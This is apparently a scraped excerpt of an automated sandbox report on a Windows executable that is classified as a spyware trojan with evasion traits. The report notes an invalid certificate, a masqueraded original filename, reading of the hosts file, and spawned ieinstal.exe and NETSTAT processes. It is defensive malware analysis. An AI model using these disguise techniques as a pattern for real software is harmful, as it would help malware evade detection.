 Source: Dgslimt_Signed_.exe Static PE information: invalid certificate
 PE file contains strange resources Show sources
 Source: Dgslimt_Signed_.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST Source: Dgslimt_Signed_.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Sample file is different than original file name gathered from version info Show sources
 Source: Dgslimt_Signed_.exe, 00000000.00000000.241042671.00000000004B1000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameProcexp.exeB vs Dgslimt_Signed_.exe Source: Dgslimt_Signed_.exe Binary or memory string: OriginalFilenameProcexp.exeB vs Dgslimt_Signed_.exe
 Yara signature match Show sources
 Classification label Show sources
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/4@6/2
 Creates files inside the user directory Show sources
 Parts of this applications are using Borland Delphi (Probably coded in Delphi) Show sources
 Reads the hosts file Show sources
 Spawns processes Show sources
 Source: unknown Process created: C:\Users\user\Desktop\Dgslimt_Signed_.exe 'C:\Users\user\Desktop\Dgslimt_Signed_.exe' Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' Source: C:\Users\user\Desktop\Dgslimt_Signed_.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' Jump to behavior Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' Jump to behavior
 Uses an in-process (OLE) Automation server Show sources
 Writes ini files Show sources